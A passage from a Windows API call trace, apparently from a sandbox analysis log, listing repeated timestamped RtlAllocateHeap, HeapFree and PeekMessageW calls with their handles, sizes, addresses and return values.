RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0139.615] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0139.615] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0139.615] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e440 [0139.615] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.615] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e440 | out: hHeap=0x12c0000) returned 1 [0139.615] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0139.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0139.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0139.615] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0139.616] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0139.616] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e180 [0139.616] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.616] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0139.616] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0139.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0139.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0139.617] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0139.617] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.617] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0139.617] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0139.617] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.617] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0139.617] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.617] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.617] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0139.617] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0139.617] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0139.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0139.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0139.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.618] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0139.618] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0139.618] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.618] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0139.618] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0139.618] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0139.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0139.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0139.618] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0139.618] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0139.619] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.619] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0139.619] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0139.619] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0139.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0139.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0139.619] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0139.619] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0139.619] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.619] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0139.619] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0139.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0139.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0139.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0139.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0139.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0139.620] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0139.620] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0139.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0139.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0139.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0139.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0139.621] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0139.621] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0139.621] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.621] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0139.621] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0139.621] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0139.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0139.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0139.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0139.753] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0139.753] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0139.753] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.753] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0139.753] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0139.753] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0139.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0139.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0139.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e300 [0139.754] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e300 | out: hHeap=0x12c0000) returned 1 [0139.754] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0139.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0139.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0139.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0139.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0139.755] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0139.755] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0139.755] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.755] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0139.755] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.755] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0139.755] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0139.755] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0139.755] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0139.755] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0139.755] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.756] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0139.756] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.756] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0139.756] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.756] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0139.756] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0139.756] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0139.756] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0139.757] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0139.757] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.757] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0139.757] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.757] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0139.757] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.757] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0139.757] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0139.757] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0139.757] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0139.757] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0139.758] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0139.758] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0139.758] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.758] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0139.758] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd40 [0139.759] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0139.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0139.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0139.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.759] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0139.759] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0139.759] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.759] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0139.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0139.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0139.760] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0139.760] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.760] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0139.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e440 [0139.760] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.760] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e440 | out: hHeap=0x12c0000) returned 1 [0139.760] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0139.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0139.761] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0139.761] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0139.761] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0139.761] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.761] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0139.761] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.761] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0139.761] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.761] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0139.761] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0139.761] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0139.762] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0139.762] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0139.762] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.762] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0139.762] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.762] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0139.763] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd40 [0139.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0139.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0139.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0139.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0139.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0139.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0139.763] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0139.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0139.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7028 [0139.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7028 | out: hHeap=0x12c0000) returned 1 [0139.764] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x1316600 [0139.764] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e00 [0139.764] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe30 [0139.764] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1302178 [0139.764] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6f68 [0139.764] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6f98 [0139.765] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6e90 [0139.765] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6e18 [0139.765] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e30 [0139.765] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b70a0 [0139.765] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7088 [0139.765] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7028 [0139.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b70b8 [0139.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6e48 [0139.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6f80 [0139.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e60 [0139.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6ec0 [0139.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6dd0 [0139.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e78 [0139.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6de8 [0139.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6ea8 [0139.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300040 [0139.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6f20 [0139.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0139.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x13166c0 [0139.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x13062f8 [0139.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6ed8 [0139.768] RtlAllocateHeap 